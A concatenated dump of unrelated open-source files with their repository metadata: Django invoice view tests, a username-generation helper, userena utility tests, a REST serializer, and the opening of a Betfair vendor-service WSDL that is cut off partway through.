def test_invoice_edit_bad_post(self):
invoice = self.get_invoice()
url = reverse('edit_invoice', args=[invoice.id])
params = {
'number': '2',
'status': 'not_in_choices',
}
response = self.client.post(url, params)
err_msg = 'Select a valid choice. not_in_choices is not one of ' + \
'the available choices.'
self.assertFormError(response, 'invoice_form', 'status', err_msg)
def test_invoice_delete_get(self):
invoice = self.get_invoice()
url = reverse('delete_invoice', args=[invoice.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_invoice_delete(self):
invoice = self.get_invoice()
entry_ids = [entry.pk for entry in invoice.entries.all()]
url = reverse('delete_invoice', args=[invoice.id])
response = self.client.post(url, {'delete': 'delete'})
self.assertEqual(response.status_code, 302)
self.assertFalse(EntryGroup.objects.filter(pk=invoice.id))
entries = Entry.objects.filter(pk__in=entry_ids)
for entry in entries:
self.assertEqual(entry.status, Entry.APPROVED)
def test_invoice_delete_cancel(self):
invoice = self.get_invoice()
url = reverse('delete_invoice', args=[invoice.id])
response = self.client.post(url, {'cancel': 'cancel'})
self.assertEqual(response.status_code, 302)
# Canceled out so the invoice was not deleted
self.assertTrue(EntryGroup.objects.get(pk=invoice.id))
def test_invoice_delete_bad_args(self):
self.get_invoice()
url = reverse('delete_invoice', args=[1232345345])
response = self.client.post(url, {'delete': 'delete'})
self.assertEqual(response.status_code, 404)
def test_rm_invoice_entry_get(self):
invoice = self.get_invoice()
entry = self.get_entry(invoice)
url = reverse('delete_invoice_entry', args=[invoice.id, entry.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['invoice'], invoice)
self.assertEqual(response.context['entry'], entry)
def test_rm_invoice_entry_get_bad_id(self):
invoice = self.get_invoice()
entry = self.get_entry(invoice)
url = reverse('delete_invoice_entry', args=[invoice.id, 999999])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
url = reverse('delete_invoice_entry', args=[9999, entry.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_rm_invoice_entry_post(self):
invoice = self.get_invoice()
entry = self.get_entry(invoice)
url = reverse('delete_invoice_entry', args=[invoice.id, entry.id])
response = self.client.post(url, {'submit': ''})
self.assertEqual(response.status_code, 302)
new_invoice = EntryGroup.objects.get(pk=invoice.pk)
rm_entry = new_invoice.entries.filter(pk=entry.id)
self.assertFalse(rm_entry)
new_entry = Entry.objects.get(pk=entry.pk)
self.assertEqual(new_entry.status, Entry.APPROVED)
self.assertEqual(new_entry.entry_group, None)
class InvoiceCreateTestCase(ViewTestMixin, TestCase):
def setUp(self):
super(InvoiceCreateTestCase, self).setUp()
self.user = factories.Superuser()
self.login_user(self.user)
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
self.project_billable = factories.BillableProject()
self.project_billable2 = factories.BillableProject()
self.project_non_billable = factories.NonbillableProject()
self.entry1 = factories.Entry(
user=self.user, project=self.project_billable,
activity=factories.Activity(billable=True),
start_time=start, end_time=end, status=Entry.APPROVED)
self.entry2 = factories.Entry(
user=self.user, project=self.project_billable,
activity=factories.Activity(billable=True),
start_time=start - relativedelta(days=5),
end_time=end - relativedelta(days=5), status=Entry.APPROVED)
self.entry3 = factories.Entry(
user=self.user, project=self.project_billable2,
activity=factories.Activity(billable=False),
start_time=start - relativedelta(days=10),
end_time=end - relativedelta(days=10), status=Entry.APPROVED)
self.entry4 = factories.Entry(
user=self.user, project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.APPROVED)
def get_create_url(self, **kwargs):
base_url = reverse('create_invoice')
params = urlencode(kwargs)
return '{0}?{1}'.format(base_url, params)
def make_hourgroups(self):
"""
Make several hour groups, one for each activity, and one that contains
all activities to check for hour groups with multiple activities.
"""
all_activities = Activity.objects.all()
for activity in all_activities:
hg = HourGroup.objects.create(name=activity.name)
hg.activities.add(activity)
def login_with_permission(self):
"""Helper to login as user with correct permissions"""
generate_invoice = Permission.objects.get(
codename='generate_project_invoice')
user = factories.User()
user.user_permissions.add(generate_invoice)
def test_invoice_confirm_view_user(self):
"""A regular user should not be able to access this page"""
self.login_user(factories.User())
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
url = self.get_create_url(
project=self.project_billable.pk,
to_date=to_date.strftime(DATE_FORM_FORMAT))
response = self.client.get(url)
self.assertEquals(response.status_code, 403)
def test_invoice_confirm_view_permission(self):
"""
If you have the correct permission, you should be
able to create an invoice
"""
self.login_with_permission()
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
url = self.get_create_url(
project=self.project_billable.pk,
to_date=to_date.strftime(DATE_FORM_FORMAT))
response = self.client.get(url)
self.assertEquals(response.status_code, 200)
def test_invoice_confirm_view(self):
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
url = self.get_create_url(
project=self.project_billable.pk,
to_date=to_date.strftime(DATE_FORM_FORMAT))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
to_date_str = response.context['to_date'].strftime('%Y %m %d')
self.assertEqual(to_date_str, '2011 01 31')
# View can also take from date
from_date = utils.add_timezone(datetime.datetime(2011, 1, 1))
kwargs = {
'project': self.project_billable.id,
'to_date': to_date.strftime(DATE_FORM_FORMAT),
'from_date': from_date.strftime(DATE_FORM_FORMAT),
}
url = self.get_create_url(**kwargs)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
from_date_str = response.context['from_date'].strftime('%Y %m %d')
to_date_str = response.context['to_date'].strftime('%Y %m %d')
self.assertEqual(from_date_str, '2011 01 01')
self.assertEqual(to_date_str, '2011 01 31')
def test_invoice_confirm_totals(self):
"""Verify that the per activity totals are valid."""
# Make a few extra entries to test per activity totals
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
# start = utils.add_timezone(datetime.datetime.now())
# end = start + relativedelta(hours=4)
activity = factories.Activity(billable=True, name='activity1')
for num in range(0, 4):
factories.Entry(
user=self.user, project=self.project_billable,
start_time=start - relativedelta(days=num),
end_time=end - relativedelta(days=num),
status=Entry.APPROVED, activity=activity)
self.make_hourgroups()
to_date = datetime.datetime(2011, 1, 31)
kwargs = {
'project': self.project_billable.id,
'to_date': to_date.strftime(DATE_FORM_FORMAT),
}
url = self.get_create_url(**kwargs)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
for name, hours_activities in response.context['billable_totals']:
total, activities = hours_activities
if name == 'activity1':
self.assertEqual(total, 16)
self.assertEqual(total, activities[0][1])
self.assertEqual(name, activities[0][0])
elif name == 'Total':
self.assertEqual(total, 24)
self.assertEqual(activities, [])
else:
# Each other activity is 4 hrs each
self.assertEqual(total, 4)
self.assertEqual(total, activities[0][1])
self.assertEqual(name, activities[0][0])
def test_invoice_confirm_bad_args(self):
# A year/month/project with no entries should raise a 404
kwargs = {
'project': self.project_billable.id,
'to_date': '2008-01-13',
}
url = self.get_create_url(**kwargs)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# A year/month with bad/overflow values should raise a 404
kwargs = {
'project': self.project_billable.id,
'to_date': '9999-13-01',
}
url = self.get_create_url(**kwargs)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_make_invoice(self):
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
kwargs = {
'project': self.project_billable.id,
'to_date': to_date.strftime(DATE_FORM_FORMAT),
}
url = self.get_create_url(**kwargs)
response = self.client.post(url, {
'number': '3',
'status': EntryGroup.INVOICED,
})
self.assertEqual(response.status_code, 302)
# Verify an invoice was created with the correct attributes
invoice = EntryGroup.objects.get(number=3)
self.assertEqual(invoice.project.id, self.project_billable.id)
self.assertEqual(invoice.start, None)
self.assertEqual(invoice.end.strftime('%Y %m %d'), '2011 01 31')
self.assertEqual(len(invoice.entries.all()), 2)
# Verify that the entries were invoiced appropriately
# and the unrelated entries were untouched
entries = Entry.objects.all()
invoiced = entries.filter(status=EntryGroup.INVOICED)
for entry in invoiced:
self.assertEqual(entry.entry_group_id, invoice.id)
approved = entries.filter(status=Entry.APPROVED)
self.assertEqual(len(approved), 2)
self.assertEqual(approved[0].entry_group_id, None)
def test_make_invoice_with_from_uninvoiced(self):
from_date = utils.add_timezone(datetime.datetime(2011, 1, 1))
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
kwargs = {
'project': self.project_billable.id,
'to_date': to_date.strftime(DATE_FORM_FORMAT),
'from_date': from_date.strftime(DATE_FORM_FORMAT),
}
url = self.get_create_url(**kwargs)
response = self.client.post(url, {'number': '5',
'status': EntryGroup.NOT_INVOICED})
self.assertEqual(response.status_code, 302)
# Verify an invoice was created with the correct attributes
invoice = EntryGroup.objects.get(number=5)
self.assertEqual(invoice.project.id, self.project_billable.id)
self.assertEqual(invoice.start.strftime('%Y %m %d'), '2011 01 01')
self.assertEqual(invoice.end.strftime('%Y %m %d'), '2011 01 31')
self.assertEqual(len(invoice.entries.all()), 1)
# Verify that the entries were invoiced appropriately
# and the unrelated entries were untouched
entries = Entry.objects.all()
uninvoiced = entries.filter(status=Entry.NOT_INVOICED)
for entry in uninvoiced:
self.assertEqual(entry.entry_group_id, invoice.id)
class ListOutstandingInvoicesViewTestCase(ViewTestMixin, TestCase):
url_name = 'list_outstanding_invoices'
def setUp(self):
super(ListOutstandingInvoicesViewTestCase, self).setUp()
self.user = factories.Superuser()
self.login_user(self.user)
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
self.project_billable = factories.BillableProject()
self.project_billable2 = factories.BillableProject()
self.project_non_billable = factories.NonbillableProject()
self.entry1 = factories.Entry(
user=self.user, project=self.project_billable,
activity=factories.Activity(billable=True),
start_time=start, end_time=end, status=Entry.APPROVED)
self.entry2 = factories.Entry(
user=self.user, project=self.project_billable,
activity=factories.Activity(billable=True),
start_time=start - relativedelta(days=5),
end_time=end - relativedelta(days=5), status=Entry.APPROVED)
self.entry3 = factories.Entry(
user=self.user, project=self.project_billable2,
activity=factories.Activity(billable=False),
start_time=start - relativedelta(days=10),
end_time=end - relativedelta(days=10), status=Entry.APPROVED)
self.entry4 = factories.Entry(
user=self.user, project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.APPROVED)
# Default get kwargs.
self.to_date = utils.add_timezone(datetime.datetime(2011, 1, 31, 0, 0, 0))
self.get_kwargs = {
'to_date': self.to_date.strftime(DATE_FORM_FORMAT),
'statuses': list(Attribute.statuses.values_list('pk', flat=True)),
}
def test_unauthenticated(self):
self.client.logout()
response = self._get()
self.assertEquals(response.status_code, 302)
def test_list_no_kwargs(self):
response = self._get(get_kwargs={})
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertFalse(form.is_bound)
self.assertFalse(form.is_valid())
self.assertEquals(response.context['project_totals'].count(), 3)
def test_list_outstanding(self):
"""Only billable projects should be listed."""
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
# The number of projects should be 3 because entry4 has billable=False
self.assertEquals(response.context['project_totals'].count(), 3)
# Verify that the date on the mark as invoiced links will be correct
self.assertEquals(response.context['to_date'], self.to_date.date())
self.assertEquals(list(response.context['unverified']), [])
self.assertEquals(list(response.context['unapproved']), [])
def test_unverified(self):
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
factories.Entry(
user=self.user,
project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.UNVERIFIED
) # unverified
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
unverified = list(response.context['unverified'])
unapproved = list(response.context['unapproved'])
expected_unverified = [
(self.user.pk, self.user.first_name, self.user.last_name)
]
self.assertEquals(unverified, expected_unverified)
self.assertEquals(unapproved, [])
def test_approved(self):
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
unapproved_entry_a = factories.Entry(
user=self.user, project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.VERIFIED)
unapproved_entry_b = factories.Entry(
user=self.user, project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.VERIFIED)
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
unverified = set(response.context['unverified'])
unapproved = set(response.context['unapproved'])
user_a, user_b = unapproved_entry_a.user, unapproved_entry_b.user
expected_unapproved = set([
(user_a.pk, user_a.first_name, user_a.last_name),
(user_b.pk, user_b.first_name, user_b.last_name),
])
self.assertEquals(unverified, set())
self.assertEquals(unapproved, expected_unapproved)
def test_no_statuses(self):
self.get_kwargs.pop('statuses')
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
self.assertEquals(response.context['project_totals'].count(), 0)
def test_to_date_required(self):
"""to_date is required."""
self.get_kwargs['to_date'] = ''
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertFalse(form.is_valid(), form.errors)
        # The form is invalid without to_date, so no project totals are listed
self.assertEquals(response.context['project_totals'].count(), 0)
def test_from_date(self):
from_date = utils.add_timezone(datetime.datetime(2011, 1, 1, 0, 0, 0))
self.get_kwargs['from_date'] = from_date.strftime(DATE_FORM_FORMAT)
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
# From date filters out one entry
self.assertEquals(response.context['project_totals'].count(), 1)
# Verify that the date on the mark as invoiced links will be correct
self.assertEquals(response.context['to_date'], self.to_date.date())
self.assertEquals(response.context['from_date'], from_date.date())
|
{
"content_hash": "33ed707a9727369989ae47e3e56707e8",
"timestamp": "",
"source": "github",
"line_count": 700,
"max_line_length": 91,
"avg_line_length": 44.32714285714286,
"alnum_prop": 0.630958135937349,
"repo_name": "arbitrahj/django-timepiece",
"id": "94fa41daff63c81d62d27ce08a3a045423396f06",
"size": "31029",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "timepiece/contracts/tests/test_invoices.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24547"
},
{
"name": "HTML",
"bytes": "221742"
},
{
"name": "JavaScript",
"bytes": "203329"
},
{
"name": "Python",
"bytes": "601941"
}
],
"symlink_target": ""
}
|
import hashlib
import random
from django.contrib.auth.models import User
def generate_username(email):
def random_username():
h = hashlib.sha1(email).hexdigest()[:25]
# don't ask
n = random.randint(1, (10 ** (5 - 1)) - 1)
return "%s%d" % (h, n)
while True:
try:
username = random_username()
User.objects.get(username=username)
except User.DoesNotExist:
break
return username
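# Hedged usage sketch, not part of the original helper: pairing
# generate_username() with Django's stock create_user() for an email-based
# signup flow. The password is assumed to be supplied by the caller.
def create_user_from_email(email, password):
    username = generate_username(email)
    return User.objects.create_user(username=username, email=email,
                                    password=password)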
|
{
"content_hash": "bb7c3b50fcc4749ee14c77e38c2301da",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 50,
"avg_line_length": 24.94736842105263,
"alnum_prop": 0.5759493670886076,
"repo_name": "PyCon/pycon",
"id": "4a214616bd4366c468657f58380de515e761ad49",
"size": "474",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "symposion/utils/signup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "80909"
},
{
"name": "Dockerfile",
"bytes": "163"
},
{
"name": "HTML",
"bytes": "313093"
},
{
"name": "JavaScript",
"bytes": "161207"
},
{
"name": "Makefile",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "993540"
},
{
"name": "Shell",
"bytes": "14094"
},
{
"name": "Smarty",
"bytes": "7379"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from django.contrib.auth.models import User
from django.conf import settings
from django.contrib.auth.models import SiteProfileNotAvailable
from userena.utils import (get_gravatar, signin_redirect, get_profile_model,
get_protocol)
from userena import settings as userena_settings
from userena.models import UserenaBaseProfile
import hashlib
class UtilsTests(TestCase):
""" Test the extra utils methods """
fixtures = ['users']
def test_get_gravatar(self):
template = 'http://www.gravatar.com/avatar/%(hash)s?s=%(size)s&d=%(type)s'
# The hash for alice@example.com
hash = hashlib.md5('alice@example.com').hexdigest()
# Check the defaults.
self.failUnlessEqual(get_gravatar('alice@example.com'),
template % {'hash': hash,
'size': 80,
'type': 'identicon'})
# Check different size
self.failUnlessEqual(get_gravatar('alice@example.com', size=200),
template % {'hash': hash,
'size': 200,
'type': 'identicon'})
# Check different default
http_404 = get_gravatar('alice@example.com', default='404')
self.failUnlessEqual(http_404,
template % {'hash': hash,
'size': 80,
'type': '404'})
# Is it really a 404?
response = self.client.get(http_404)
self.failUnlessEqual(response.status_code, 404)
# Test the switch to HTTPS
userena_settings.USERENA_MUGSHOT_GRAVATAR_SECURE = True
template = 'https://secure.gravatar.com/avatar/%(hash)s?s=%(size)s&d=%(type)s'
self.failUnlessEqual(get_gravatar('alice@example.com'),
template % {'hash': hash,
'size': 80,
'type': 'identicon'})
# And set back to default
userena_settings.USERENA_MUGSHOT_GRAVATAR_SECURE = False
def test_signin_redirect(self):
"""
        Test the redirect function, which should redirect the user after a
        successful signin.
"""
# Test with a requested redirect
self.failUnlessEqual(signin_redirect(redirect='/accounts/'), '/accounts/')
# Test with only the user specified
user = User.objects.get(pk=1)
self.failUnlessEqual(signin_redirect(user=user),
'/accounts/%s/' % user.username)
# The ultimate fallback, probably never used
self.failUnlessEqual(signin_redirect(), settings.LOGIN_REDIRECT_URL)
def test_get_profile_model(self):
"""
Test if the correct profile model is returned when
``get_profile_model()`` is called.
"""
# A non existent model should also raise ``SiteProfileNotAvailable``
# error.
settings.AUTH_PROFILE_MODULE = 'userena.FakeProfile'
self.assertRaises(SiteProfileNotAvailable, get_profile_model)
# An error should be raised when there is no ``AUTH_PROFILE_MODULE``
# supplied.
settings.AUTH_PROFILE_MODULE = None
self.assertRaises(SiteProfileNotAvailable, get_profile_model)
def test_get_protocol(self):
""" Test if the correct protocol is returned """
self.failUnlessEqual(get_protocol(), 'http')
userena_settings.USERENA_USE_HTTPS = True
self.failUnlessEqual(get_protocol(), 'https')
userena_settings.USERENA_USE_HTTPS = False
|
{
"content_hash": "ebc8094051185cb52c690af9214d891a",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 86,
"avg_line_length": 38.577319587628864,
"alnum_prop": 0.5734901122394441,
"repo_name": "pjdelport/django-userena",
"id": "47452f89a20ab00eb6ae49f5ed3fb95f823d3f8e",
"size": "3742",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "userena/tests/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "218437"
},
{
"name": "Racket",
"bytes": "364"
},
{
"name": "Shell",
"bytes": "786"
}
],
"symlink_target": ""
}
|
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import Card
class UserSimpleSerializer(serializers.ModelSerializer):
class Meta(object):
model = User
fields = ('username', 'first_name', 'last_name', 'is_staff', 'is_active', 'email')
class CardSerializer(serializers.ModelSerializer):
created_by = UserSimpleSerializer()
updated_by = UserSimpleSerializer()
class Meta(object):
model = Card
fields = '__all__'
depth = 1
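# Hedged usage sketch (not part of the original module): serializing a
# queryset of cards, e.g. from a list endpoint; the surrounding view wiring
# is assumed.
def serialize_cards(queryset):
    return CardSerializer(queryset, many=True).data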
|
{
"content_hash": "c059af9e7d1d85166aeed3fe99b1adc9",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 90,
"avg_line_length": 26.4,
"alnum_prop": 0.6799242424242424,
"repo_name": "neosergio/WisdomBox",
"id": "0d293177f49e12ad1523c0fde3cd7394c85dc0c9",
"size": "528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cards/serializers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12675"
}
],
"symlink_target": ""
}
|
'''
BfPy wsdl variables holding the Betfair WSDL definitions
'''
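# Hedged, illustrative helper (not part of BfPy itself): one way to hand an
# in-memory WSDL string such as BFVendorService to a SOAP toolkit that only
# accepts URLs is to spill it to a temporary file and point at it with a
# file:// URL. Only the standard library is used here; the consuming SOAP
# client is left to the caller.
def _example_wsdl_to_url(wsdl_text):
    import tempfile
    handle = tempfile.NamedTemporaryFile(suffix='.wsdl', delete=False)
    handle.write(wsdl_text)
    handle.close()
    return 'file://' + handle.name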
#
# Variables containing the Betfair WSDL files
#
BFVendorService = '''
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright 2003-2004 The Sporting Exchange Limited. All rights reserved.
The presentation, distribution or other dissemination of the information contained herein by The Sporting Exchange Limited (Betfair) is not a license, either expressly or impliedly, to any intellectual property owned or controlled by Betfair.
Save as provided by statute and to the fullest extent permitted by law, the following provisions set out the entire liability of Betfair (including any liability for the acts and omissions of its employees, agents and sub-contractors) to the User in respect of the use of its WSDL file whether in contract, tort, statute, equity or otherwise:
(a) The User acknowledges and agrees that (except as expressly provided in this Agreement) the WSDL is provided "AS IS" without warranties of any kind (whether express or implied);
(b) All conditions, warranties, terms and undertakings (whether express or implied, statutory or otherwise relating to the delivery, performance, quality, uninterrupted use, fitness for purpose, occurrence or reliability of the WSDL are hereby excluded to the fullest extent permitted by law; and
(c) Betfair shall not be liable to the User for loss of profit (whether direct or indirect), loss of contracts or goodwill, lost advertising, loss of data or any type of special, indirect, consequential or economic loss (including loss or damage suffered by the User as a result of an action brought by a third party) even if such loss was reasonably foreseeable or Betfair had been advised of the possibility of the User incurring such loss.
No exclusion or limitation set out in this Agreement shall apply in the case of fraud or fraudulent concealment, death or personal injury resulting from the negligence of either party or any of its employees, agents or sub-contractors; and/or any breach of the obligations implied by (as appropriate) section 12 of the Sale of Goods Act 1979, section 2 of the Supply of Goods and Services Act 1982 or section 8 of the Supply of Goods (Implied Terms) Act 1973.
-->
<wsdl:definitions name="VendorService"
xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:types="http://www.betfair.com/adminapi/types/v2/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://www.betfair.com/adminapi/v2/VendorService/"
xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
targetNamespace="http://www.betfair.com/adminapi/v2/VendorService/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">
<wsdl:types>
<xsd:schema targetNamespace="http://www.betfair.com/adminapi/types/v2/">
<xsd:import namespace="http://schemas.xmlsoap.org/soap/encoding/"/>
<xsd:complexType name="SetAccessRequestReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="accessRequestToken" nillable="false" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="SetAccessRequestResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorSoftwareName" nillable="false" type="xsd:string"/>
<xsd:element name="expiryDate" nillable="false" type="xsd:dateTime"/>
<xsd:element name="errorCode" type="types:SetAccessRequestErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="SetAccessRequestErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INVALID_ACCESS_REQUEST_TOKEN"/>
<xsd:enumeration value="REQUEST_ALREADY_DONE"/>
<xsd:enumeration value="REQUEST_EXPIRED"/>
<xsd:enumeration value="REQUEST_CANCELLED"/>
<xsd:enumeration value='VENDOR_SOFTWARE_INVALID'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INACTIVE'/>
<xsd:enumeration value='USER_ALREADY_SUBSCRIBED'/>
<xsd:enumeration value="API_ERROR"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="CancelVendorAccessRequestReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="accessRequestToken" nillable="false" type="xsd:string"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="CancelVendorAccessRequestResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="errorCode" type="types:CancelVendorAccessRequestErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="CancelVendorAccessRequestErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INVALID_VENDOR_SOFTWARE_ID"/>
<xsd:enumeration value="INVALID_VENDOR_SESSION" />
<xsd:enumeration value="OPERATOR_NOT_VENDORSOFTWARE_OWNER" />
<xsd:enumeration value='INVALID_ACCESS_REQUEST_TOKEN'/>
<xsd:enumeration value='INVALID_VENDOR_CLIENT_ACCESS_REQUEST_STATUS'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INVALID'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INACTIVE'/>
<xsd:enumeration value="API_ERROR"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="GetVendorAccessRequestsReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="status" type="types:VendorClientAccessRequestStatusEnum"/>
<xsd:element name="requestDateFrom" nillable="true" type="xsd:dateTime"/>
<xsd:element name="requestDateTo" nillable="true" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetVendorAccessRequestsResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorAccessRequests" nillable="true" type="types:ArrayOfVendorAccessRequest"/>
<xsd:element name="errorCode" type="types:GetVendorAccessRequestsErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="ArrayOfVendorAccessRequest">
<xsd:sequence>
<xsd:element name="vendorAccessRequest" form="qualified" maxOccurs="unbounded"
nillable="true" type="types:VendorAccessRequest"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="VendorAccessRequest">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorCustomField" nillable="false" type="xsd:string"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="accessRequestToken" nillable="false" type="xsd:string"/>
<xsd:element name="expiryDate" nillable="false" type="xsd:dateTime"/>
<xsd:element name="status" nillable="true" type="types:VendorClientAccessRequestStatusEnum"/>
</xsd:sequence>
</xsd:complexType>
<xsd:simpleType name="GetVendorAccessRequestsErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INVALID_VENDOR_SOFTWARE_ID"/>
<xsd:enumeration value="INVALID_VENDOR_SESSION" />
<xsd:enumeration value="OPERATOR_NOT_VENDORSOFTWARE_OWNER" />
<xsd:enumeration value='VENDOR_SOFTWARE_INACTIVE'/>
<xsd:enumeration value='INVALID_STATUS'/>
<xsd:enumeration value='NO_RESULTS'/>
<xsd:enumeration value="API_ERROR"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:simpleType name="VendorClientAccessRequestStatusEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="ACTIVE"/>
<xsd:enumeration value="CANCELLED"/>
<xsd:enumeration value="EXPIRED"/>
<xsd:enumeration value="DONE"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="CreateVendorAccessRequestReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="vendorCustomField" nillable="false" type="xsd:string"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="expiryDate" nillable="true" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="CreateVendorAccessRequestResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="errorCode" type="types:CreateVendorAccessRequestErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
<xsd:element name="accessRequestToken" nillable="true" type="xsd:string"/>
<xsd:element name="validUntil" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="CreateVendorAccessRequestErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value='OK'/>
<xsd:enumeration value='INVALID_VENDOR_SOFTWARE_ID'/>
<xsd:enumeration value='INVALID_VENDOR_SESSION'/>
<xsd:enumeration value='OPERATOR_NOT_VENDORSOFTWARE_OWNER'/>
<xsd:enumeration value='LOGIN_RESTRICTED_LOCATION'/>
